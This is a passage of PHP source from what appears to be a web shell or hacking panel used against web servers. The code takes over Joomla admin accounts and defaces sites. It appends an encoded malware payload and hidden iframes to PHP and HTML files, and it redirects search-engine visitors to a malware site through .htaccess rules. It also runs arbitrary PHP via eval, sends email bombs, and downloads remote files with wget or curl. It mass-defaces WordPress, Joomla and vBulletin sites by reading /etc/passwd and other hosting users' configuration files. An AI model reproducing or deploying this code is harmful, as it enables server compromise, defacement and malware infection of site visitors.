3343 $link=mysql_connect($localhost,$username,$password) ;
3344 mysql_select_db($dbname,$link);
3345
3346 $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
3347
3348 $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
3349
3350 if ( $req )
3351 {
3352 $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
3353 $data = mysql_fetch_array($req);
3354 $template_name=$data["template"];
3355
3356 $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
3357 $data = mysql_fetch_array($req);
3358 $template_id=$data["extension_id"];
3359
3360 $url2=$site_url."/index.php";
3361
3362 $ch = curl_init();
3363 curl_setopt($ch, CURLOPT_URL, $url2);
3364 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3365 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3366 curl_setopt($ch, CURLOPT_HEADER, 1);
3367 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3368 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3369 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3370
3371
3372 $buffer = curl_exec($ch);
3373
3374 $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
3375 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
3376
3377
3378 $url2=$site_url."/index.php";
3379 $ch = curl_init();
3380 curl_setopt($ch, CURLOPT_URL, $url2);
3381 curl_setopt($ch, CURLOPT_POST, 1);
3382 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
3383 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3384 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3385 curl_setopt($ch, CURLOPT_HEADER, 0);
3386 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3387 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3388 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3389 $buffer = curl_exec($ch);
3390
3391 $pos = strpos($buffer,"com_config");
3392 if($pos === false)
3393 {
3394 echo("<br>[-] Login Error");
3395 exit;
3396 }
3397
3398 $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
3399 $ch = curl_init();
3400 curl_setopt($ch, CURLOPT_URL, $url2);
3401 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3402 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3403 curl_setopt($ch, CURLOPT_HEADER, 0);
3404 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3405 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3406
3407 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3408 $buffer = curl_exec($ch);
3409
3410 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
3411 if(!$hidden2)
3412 {
3413 echo("<br>[-] index.php Not found in Theme Editor");
3414 exit;
3415 }
3416
3417 $url2=$site_url."/index.php?option=com_templates&layout=edit";
3418
3419 $ch = curl_init();
3420 curl_setopt($ch, CURLOPT_URL, $url2);
3421 curl_setopt($ch, CURLOPT_POST, 1);
3422 curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
3423
3424 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3425 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3426 curl_setopt($ch, CURLOPT_HEADER, 0);
3427 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3428 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3429 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3430 $buffer = curl_exec($ch);
3431
3432 $pos = strpos($buffer,'<dd class="message message">');
3433 if($pos === false)
3434 {
3435 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
3436 }
3437 else
3438 {
3439 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
3440 }
3441 }
3442 else
3443 {
3444 $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
3445 $data = mysql_fetch_array($req);
3446 $template_name=$data["template"];
3447
3448 $url2=$site_url."/index.php";
3449 $ch = curl_init();
3450 curl_setopt($ch, CURLOPT_URL, $url2);
3451 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3452 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3453 curl_setopt($ch, CURLOPT_HEADER, 1);
3454 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3455 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3456 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3457 $buffer = curl_exec($ch);
3458
3459 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
3460
3461 $url2=$site_url."/index.php";
3462 $ch = curl_init();
3463 curl_setopt($ch, CURLOPT_URL, $url2);
3464 curl_setopt($ch, CURLOPT_POST, 1);
3465 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
3466 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3467 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3468 curl_setopt($ch, CURLOPT_HEADER, 0);
3469 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3470 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3471 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3472 $buffer = curl_exec($ch);
3473
3474 $pos = strpos($buffer,"com_config");
3475
3476 if($pos === false)
3477 {
3478 echo("<br>[-] Login Error");
3479 exit;
3480 }
3481
3482 $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
3483 $ch = curl_init();
3484 curl_setopt($ch, CURLOPT_URL, $url2);
3485 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3486 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3487 curl_setopt($ch, CURLOPT_HEADER, 0);
3488 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3489 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3490 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3491 $buffer = curl_exec($ch);
3492
3493 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
3494
3495 if(!$hidden2)
3496 {
3497 echo("<br>[-] index.php Not found in Theme Editor");
3498 }
3499
3500 $url2=$site_url."/index.php?option=com_templates&layout=edit";
3501 $ch = curl_init();
3502 curl_setopt($ch, CURLOPT_URL, $url2);
3503 curl_setopt($ch, CURLOPT_POST, 1);
3504 curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
3505 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3506 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3507 curl_setopt($ch, CURLOPT_HEADER, 0);
3508 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3509 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3510 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3511 $buffer = curl_exec($ch);
3512
3513 $pos = strpos($buffer,'<dd class="message message fade">');
3514 if($pos === false)
3515 {
3516 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
3517 exit;
3518 }
3519 else
3520 {
3521 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
3522 }
3523 }
3524 }
3525}
3526else if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '')
3527{
3528 $filetype = $_POST['filetype'];
3529
3530 $mode = "a";
3531
3532 if($_POST['mode'] == 'Apender')
3533 $mode = "a";
3534
3535 if($_POST['mode'] == 'Overwriter')
3536 $mode = "w";
3537
3538 if (is_dir($_POST['pathtomass']))
3539 {
3540 $lolinject = $_POST['injectthis'];
3541 $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype;
3542 if(substr($_POST['pathtomass'], -1) == "\\")
3543 $mypath = $_POST['pathtomass'] . "*.".$filetype;
3544 foreach (glob($mypath) as $injectj00)
3545 {
3546 if($injectj00 == getcwd().$_SERVER['SCRIPT_NAME'])
3547 continue;
3548 $fp=fopen($injectj00,$mode);
3549 if (fputs($fp,$lolinject))
3550 echo '<br><font class=txt size=3>'.$injectj00.' was injected<br></font>';
3551 else
3552 echo 'failed to inject '.$injectj00.'<br>';
3553 }
3554 $dirs = glob($_POST['pathtomass'] . '/*' , GLOB_ONLYDIR);
3555 foreach ($dirs as $dir)
3556 {
3557 injectdir($dir,$filetype,$mode,$lolinject);
3558 }
3559 echo "<center>".$mycount." files injected</center>";
3560 }
3561 else
3562 echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
3563}
3564else if(isset($_POST['mailfunction']))
3565{
3566 if($_POST['mailfunction'] == "dobombing")
3567 {
3568 if(isset($_POST['to']) && isset($_POST['subject']) && isset($_POST['message']) && isset($_POST['times']) && $_POST['to'] != '' && $_POST['subject'] != '' && $_POST['message'] != '' && $_POST['times'] != '')
3569 {
3570 $times = $_POST['times'];
3571 while($times--)
3572 {
3573 if(isset($_POST['padding']))
3574 {
3575 $fromPadd = rand(0,9999);
3576 $subjectPadd = " -- ID : ".rand(0,9999999);
3577 $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
3578
3579 }
3580 $from = "hello$fromPadd@abcd.in";
3581 if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from))
3582 {
3583 $error = 1;
3584 echo "<center><font size=3><blink><blink>Some Error Occured!</blink></font></center>";
3585 break;
3586 }
3587 }
3588 if($error != 1)
3589 echo "<center><font class=txt size=3><blink>Mail(s) Sent!</blink></font></center>";
3590 }
3591 }
3592 else if($_POST['mailfunction'] == "massmailing")
3593 {
3594 if(isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['message']))
3595 {
3596 if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from']))
3597 echo "<center><font class=txt size=3><blink>Mail Sent!</blink></font></center>";
3598 else
3599 echo "<center><font size=3><blink>Some Error Occured!</blink></font></center>";
3600 }
3601 }
3602}
3603else if(isset($_POST['code']))
3604{
3605 if($_POST['code'] != null && isset($_POST['intext']) && $_POST['intext'] == "true")
3606 {
3607 // FIlter Some Chars we dont need
3608 ?><br>
3609 <textarea name="code" class="box" cols="120" rows="10"><?php
3610 $code = str_replace("<?php","",$_POST['code']);
3611 $code = str_replace("<?","",$code);
3612 $code = str_replace("?>","",$code);
3613
3614 // Evaluate PHP CoDE!
3615 htmlspecialchars(eval($code));
3616 ?>
3617 </textarea><?php
3618 }
3619 else if($_POST['code'] != null && $_POST['intext'] == "false")
3620 {
3621 $code = str_replace("<?php","",$_POST['code']);
3622 $code = str_replace("<?","",$code);
3623 $code = str_replace("?>","",$code);
3624
3625 // Evaluate PHP CoDE!
3626 ?><br><font size="4">Result of execution this PHP-code :</font><br><font class=txt><?php htmlspecialchars(eval($code)); ?></font><?php
3627 }
3628}
3629else if(isset($_GET['infect']))
3630{
3631 $mal_code="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";
3632 $coun = 0;
3633 foreach (glob($_GET['path'] . $directorysperator . "*.php") as $injectj00)
3634 {
3635 if($injectj00 == getcwd().$_SERVER['SCRIPT_NAME'])
3636 continue;
3637 if($myfile=fopen($injectj00,'a'))
3638 {
3639 fputs($myfile, gzuncompress(base64_decode($mal_code)));
3640 fclose($myfile);
3641 $coun = 1;
3642 }
3643 }
3644 foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
3645 {
3646 if($myfile=fopen($injectj00,'a'))
3647 {
3648 fputs($myfile, gzuncompress(base64_decode($mal_code)));
3649 fclose($myfile);
3650 $coun = 1;
3651 }
3652 }
3653 foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
3654 {
3655 if($myfile=fopen($injectj00,'a'))
3656 {
3657 fputs($myfile, gzuncompress(base64_decode($mal_code)));
3658 fclose($myfile);
3659 $coun = 1;
3660 }
3661 }
3662 if($coun == 1)
3663 echo "<center>Done !!!!<center>";
3664 else
3665 echo "<center>Cannot open files !!!!<center>";
3666}
3667else if(isset($_GET['infectiframe']))
3668{
3669 $coun = 0;
3670 $str = "<iframe width=0px height=0px frameborder=no name=frame1 src=".$malsite."> </iframe>";
3671 foreach (glob($_GET['path'] . $directorysperator . "*.php") as $injectj00)
3672 {
3673 if($injectj00 == getcwd().$_SERVER['SCRIPT_NAME'])
3674 continue;
3675 if($myfile=fopen($injectj00,'a'))
3676 {
3677 fputs($myfile, $str);
3678 fclose($myfile);
3679 $coun = 1;
3680 }
3681 }
3682 foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
3683 {
3684 if($myfile=fopen($injectj00,'a'))
3685 {
3686 fputs($myfile, $str);
3687 fclose($myfile);
3688 $coun = 1;
3689 }
3690 }
3691 foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
3692 {
3693 if($myfile=fopen($injectj00,'a'))
3694 {
3695 fputs($myfile, $str);
3696 fclose($myfile);
3697 $coun = 1;
3698 }
3699 }
3700
3701
3702 if($coun == 1)
3703 echo "<center>Done !!!!<center>";
3704 else
3705 echo "<center>Cannot open files !!!!<center>";
3706}
3707else if(isset($_GET['redirect']))
3708{
3709 if($myfile = fopen(".htaccess",'a'))
3710 {
3711 $mal = "# BEGIN WordPress
3712RewriteEngine On
3713RewriteOptions inherit
3714RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
3715RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
3716RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
3717RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
3718RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
3719RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
3720RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
3721RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
3722RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
3723RewriteRule .* ".$malsite." [R,L]\n\r";
3724 fwrite($myfile, $mal);
3725 fclose($myfile);
3726 echo "<center>Done !!!!<center>";
3727 }
3728 else
3729 echo "<center>Cannot open file !!!!<center>";
3730}
3731else if(isset($_GET['malware']))
3732{ ?>
3733 <input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
3734 <center><table><tr><td><a href=# onClick="malwarefun('infect')"><font class=txt size="4">| Infect Users |</font></a></td>
3735 <td><a href=# onClick="malwarefun('infectiframe')"><font class=txt size="4">| Infect Users with Iframe |</font></a></td>
3736 <td><a href=javascript:void(0) onClick="malwarefun('redirect')"><font class=txt size="4">| Redirect Search Engine TO Malwared site |</font></a></td></tr></table></center>
3737 <div id="showmal"></div>
3738 <?php
3739}
3740else if(isset($_GET['codeinsert']))
3741{
3742 if($file1 = fopen(".htaccess",'r'))
3743 {
3744 ?><div id="showcode"></div>
3745 <form method=post>
3746 <textarea rows=9 cols=110 name="code" class=box><?php while(!feof($file1)) { echo fgets($file1); } ?></textarea><br>
3747 <input type="button" onClick="codeinsert(code.value)" value=" Insert " class=but>
3748 </form>
3749 <?php }
3750 else
3751 echo "<center>Cannot Open File!!</center>";
3752}
3753else if(isset($_POST['getcode']))
3754{
3755 if($myfile = fopen(".htaccess",'a'))
3756 {
3757 fwrite($myfile, $_POST['getcode']);
3758 fwrite($myfile, "\n\r");
3759 fclose($myfile);
3760 echo "<font class=txt>Code Inserted Successfully!!!!</font>";
3761 }
3762 else
3763 echo "Permission Denied";
3764}
3765else if(isset($_GET['uploadurl']))
3766{
3767 $functiontype = trim($_GET['functiontype']);
3768 $wurl = trim($_GET['wurl']);
3769 $path = magicboom($_GET['path']);
3770
3771 function remotedownload($cmd,$url)
3772 {
3773 $namafile = basename($url);
3774 switch($cmd)
3775 {
3776 case 'wwget':
3777 execmd(which('wget')." ".$url." -O ".$namafile);
3778 break;
3779 case 'wlynx':
3780 execmd(which('lynx')." -source ".$url." > ".$namafile);
3781 break;
3782 case 'wfread' :
3783 execmd($wurl,$namafile);
3784 break;
3785 case 'wfetch' :
3786 execmd(which('fetch')." -o ".$namafile." -p ".$url);
3787 break;
3788 case 'wlinks' :
3789 execmd(which('links')." -source ".$url." > ".$namafile);
3790 break;
3791 case 'wget' :
3792 execmd(which('GET')." ".$url." > ".$namafile);
3793 break;
3794 case 'wcurl' :
3795 execmd(which('curl')." ".$url." -o ".$namafile);
3796 break;
3797 default:
3798 break;
3799 }
3800 return $namafile;
3801 }
3802 $namafile = remotedownload($functiontype,$wurl);
3803
3804 $fullpath = $path . $directorysperator . $namafile;
3805 if(is_file($fullpath))
3806 {
3807 echo "<center><font class=txt>File uploaded to $fullpath</font></center>";
3808 }
3809 else
3810 echo "<center>Failed to upload $namafile</center>";
3811}
3812else if(isset($_GET['createfolder']))
3813{
3814 if(!mkdir($_GET['createfolder']))
3815 echo '<BR>Failed To create<BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR><BR>';
3816 else
3817 echo '<BR><font class=txt>Folder Created Successfully</font><BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR><BR>';
3818}
3819else if(isset($_GET['selfkill']))
3820{
3821 if(unlink($curfile))
3822 echo "<br><center><font size=5>Good Bye......</font></center>";
3823 else
3824 echo "<br><center><font size=5>Shell cannot be removed......</font></center>";
3825}
3826else if(isset($_GET['Create']))
3827{
3828 ?><BR>
3829 <form method="post">
3830 <input type="hidden" name="filecreator" value="<?php echo $_GET['Create']; ?>">
3831 <textarea name="filecontent" rows="12" cols="100" class="box"></textarea><br />
3832 <input type="button" onClick="createfile(filecreator.value,filecontent.value)" value=" Save " class="but"/>
3833 <input name="save" type="button" onClick="cancel()" value="Cancel" id="spacing" class="but"/>
3834 </form>
3835
3836<?php }
3837else if(isset($_GET['readfile']))
3838{
3839 if(is_file($_GET['readfile']))
3840 {
3841 $owner = "0/0";
3842 if($os == "Linux")
3843 $owner = getOGid($_GET['readfile']);
3844 ?>
3845 <form>
3846 <table style="width:57%;">
3847 <tr align="left">
3848 <td align="left">File : </td><td><font class=txt><?php echo $_GET['readfile'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['readfile']); ?>')"><?php echo filepermscolor($_GET['readfile']);?></a></td>
3849 </tr>
3850 <tr>
3851 <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['readfile']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
3852 </tr>
3853 </table>
3854 <textarea name="content" rows="15" cols="100" class="box"><?php
3855 $content = htmlspecialchars(file_get_contents($_GET['readfile']));
3856 if($content)
3857 {
3858 echo $content;
3859 }
3860 else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
3861 {
3862 if(filesize($_GET['readfile']) != 0 )
3863 {
3864 fopen($_GET['readfile']);
3865 while(!feof())
3866 {
3867 echo htmlspecialchars(fgets($_GET['readfile']));
3868 }
3869 }
3870 }
3871
3872 ?>
3873 </textarea><br />
3874 <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['readfile']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
3875 <input type="button" onClick="cancel()" value="cancel" class="but" />
3876 </form>
3877 <?php
3878 }
3879 else
3880 echo '<BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR>File does not exist !!!!<BR>';
3881}
3882else if(isset($_POST['filecreator'])&&isset($_POST['filecontent']))
3883{
3884 $content = $_POST['filecontent'];
3885 if($file_pointer = fopen($_POST['filecreator'], "w+"))
3886 {
3887 fwrite($file_pointer, $content);
3888 fclose($file_pointer);
3889 echo "<font class=txt>File Created Successfully</font>";
3890 }
3891 else
3892 echo "Cannot Create File";
3893}
3894else if(isset($_REQUEST["massdeface"]))
3895{
3896?><center><table><tr><td><a href=# onClick="getmydefacedata('masswp')"><font class=txt size="4">| Wordpress |</font></a></td>
3897 <td><a href=# onClick="getmydefacedata('massjo')"><font class=txt size="4">| Joomla |</font></a></td>
3898 <td><a href=# onClick="getmydefacedata('massvb')"><font class=txt size="4">| Vbulletin |</font></a></td>
3899 </tr></table></center><br><div id="showmydeface"></div><?php
3900}
3901else if(isset($_REQUEST["masswp"]))
3902{
3903 ?><center><form method="post">
3904 <textarea id="massdef" cols=80 rows="19" class="box">You Just Got Hacked</textarea>
3905 <br><input type="button" onClick="massdeface('domasswp',massdef.value)" class="but" value=" Go "></form></center><br><div id="showdef"></div><?php
3906}
3907else if(isset($_REQUEST["massjo"]))
3908{
3909 ?><center><form method="post"><textarea id="massdef" cols=80 rows="20" class="box">You Just Got Hacked</textarea>
3910 <br><input type="button" onClick="massdeface('domassjo',massdef.value)" class="but" value=" Go "></form></center><br><div id="showdef"></div><?php
3911}
3912else if(isset($_REQUEST["massvb"]))
3913{
3914 ?><center><form method="post"><textarea id="massdef" cols=80 rows="20" class="box">You Just Got Hacked</textarea>
3915 <br><input type="button" onClick="massdeface('domassvb',massdef.value)" class="but" value=" Go "></form></center><br><div id="showdef"></div><?php
3916}
3917else if(isset($_REQUEST["massscript"]))
3918{
3919 if($os != "Windows")
3920 {
3921 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
3922 $path=explode('/',$url);
3923 $url =str_replace($path[count($path)-1],'',$url);
3924
3925 if($_REQUEST["massscript"] == "domasswp")
3926 {
3927 echo "<center><table border=1 style='width:70%;'><tr align=center><th>Site</th><th>Message</th><tr>";
3928 mkdir("dhanush");
3929 chdir("dhanush");
3930 execmd("ln -s / root");
3931 $file3 = 'Options all
3932 DirectoryIndex Sux.html
3933 AddType text/plain .php
3934 AddHandler server-parsed .php
3935 AddType text/plain .html
3936 AddHandler txt .html
3937 Require None
3938 Satisfy Any
3939 ';
3940 $fp3 = fopen('.htaccess','w');
3941 $fw3 = fwrite($fp3,$file3);
3942 @fclose($fp3);
3943 if(@file('/etc/passwd'))
3944 {
3945 $users = file('/etc/passwd');
3946 foreach($users as $user)
3947 {
3948 $user = explode(':', $user);
3949
3950 $conf = @file_get_contents($url."dhanush/root/home/".$user[0]."/public_html/wp-config.php");
3951 if(entre2v2($conf,"define('DB_USER', '","');"))
3952 changeindexwp($conf,$_REQUEST['massdef']);
3953 }
3954 }
3955 else
3956 {
3957 $temp = "";
3958 $val1 = 0;
3959 $val2 = 1000;
3960 for(;$val1 <= $val2;$val1++)
3961 {
3962 $uid = @posix_getpwuid($val1);
3963 if ($uid)
3964 $temp .= join(':',$uid)."\n";
3965 }
3966
3967 $temp = trim($temp);
3968
3969 if($file5 = fopen("test.txt","w"))
3970 {
3971 fputs($file5,$temp);
3972 fclose($file5);
3973
3974 $file = fopen("test.txt", "r");
3975 while(!feof($file))
3976 {
3977 $s = fgets($file);
3978 $matches = array();
3979 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
3980 $matches = str_replace("home/","",$matches[1]);
3981 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
3982 continue;
3983 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/wp-config.php");
3984 if(entre2v2($conf,"define('DB_USER', '","');"))
3985 changeindexwp($conf,$_REQUEST['massdef']);
3986 }
3987 fclose($file);
3988 }
3989 }
3990 }
3991 elseif($_REQUEST["massscript"] == "domassjo")
3992 {
3993 mkdir("dhanush");
3994 chdir("dhanush");
3995 $d0mains = @file("/etc/named.conf");
3996 if($d0mains)
3997 {
3998 $defcount = 0;
3999 echo "<center><table border=1 style='width:80%;'><tr align=center><th>Login new info</th><th>Login info</th><th>Site</th><th>Message</th><tr>";
4000 foreach($d0mains as $d0main)
4001 {
4002 if(eregi("zone",$d0main))
4003 {
4004 preg_match_all('#zone "(.*)"#', $d0main, $domains);
4005 flush();
4006
4007 if(strlen(trim($domains[1][0])) > 2)
4008 {
4009 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
4010 $conf = @file_get_contents($url."dhanush/root/home/".$user['name']."/public_html/configuration.php");
4011 if(entre2v2($conf,$dol."user = '","';"))
4012 changeindexjo($conf,$_REQUEST['massdef'],$domains[1][0]);
4013 }
4014 }
4015 }
4016 echo '</table><br><h3>'.$defcount.' sites defaced</h3>';
4017 }
4018 else
4019 echo "Cannot Read /etc/named.conf";
4020 }
4021 elseif($_REQUEST["massscript"] == "domassvb")
4022 {
4023 mkdir("dhanush");
4024 chdir("dhanush");
4025 echo "<center><table border=1 style='width:70%;'><tr align=center><th>Site</th><th>Message</th><tr>";
4026
4027 if(@file('/etc/passwd'))
4028 {
4029 $users = file('/etc/passwd');
4030 foreach($users as $user)
4031 {
4032 $user = explode(':', $user);
4033 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/includes/config.php");
4034 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4035 changeindexvb($conf,$_REQUEST['massdef']);
4036 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/vb/configuration.php");
4037 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4038 changeindexvb($conf,$_REQUEST['massdef']);
4039 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/forum/configuration.php");
4040 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4041 changeindexvb($conf,$_REQUEST['massdef']);
4042 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/core/configuration.php");
4043 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4044 changeindexvb($conf,$_REQUEST['massdef']);
4045 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/vb/core/configuration.php");
4046 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4047 changeindexvb($conf,$_REQUEST['massdef']);
4048 }
4049 }
4050 else
4051 {
4052 $temp = "";
4053 $val1 = 0;
4054 $val2 = 1000;
4055 for(;$val1 <= $val2;$val1++)
4056 {
4057 $uid = @posix_getpwuid($val1);
4058 if ($uid)
4059 $temp .= join(':',$uid)."\n";
4060 }
4061
4062 $temp = trim($temp);
4063
4064 if($file5 = fopen("test.txt","w"))
4065 {
4066 fputs($file5,$temp);
4067 fclose($file5);
4068
4069 $file = fopen("test.txt", "r");
4070 while(!feof($file))
4071 {
4072 $s = fgets($file);
4073 $matches = array();
4074 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
4075 $matches = str_replace("home/","",$matches[1]);
4076 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
4077 continue;
4078 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/includes/config.php");
4079 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4080 changeindexvb($conf,$_REQUEST['massdef']);
4081 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/vb/configuration.php");
4082 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4083 changeindexvb($conf,$_REQUEST['massdef']);
4084 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/forum/configuration.php");
4085 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4086 changeindexvb($conf,$_REQUEST['massdef']);
4087 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/core/configuration.php");
4088 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4089 changeindexvb($conf,$_REQUEST['massdef']);
4090 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/vb/core/configuration.php");
4091 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4092 changeindexvb($conf,$_REQUEST['massdef']);
4093 changeindexvb($conf,$_REQUEST['massdef']);
4094 }
4095 fclose($file);
4096 }
4097 }
4098 }
4099 echo "</table><center>";
4100 }
4101 else
4102 echo "<center>Cannot do mass deface</center>";
4103}
4104else if(isset($_REQUEST["defaceforum"]))
4105{
4106 ?>
4107 <center><div id="showdeface"></div>
4108 <font size="4">Forum Index Changer</font>
4109 <form action="<?php echo $self; ?>" method = "POST">
4110 <input type="hidden" name="forum">
4111 <input type="hidden" name="defaceforum">
4112 <table class=btmtbl border = "1" width="60%" style="text-align: center;" align="center">
4113 <tr>
4114 <td height="50" width="50%"> Host : <input class="sbox" type="text" name="f1" size="20" value="localhost"></td>
4115
4116 <td width="50%"> Database : <input type ="text" class="sbox" name = "f2" size="20"></td></tr>
4117 <tr><td height="50" width="50%">User : <input type ="text" class="sbox" name = "f3" size="20"> </td>
4118 <td> Password : <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
4119
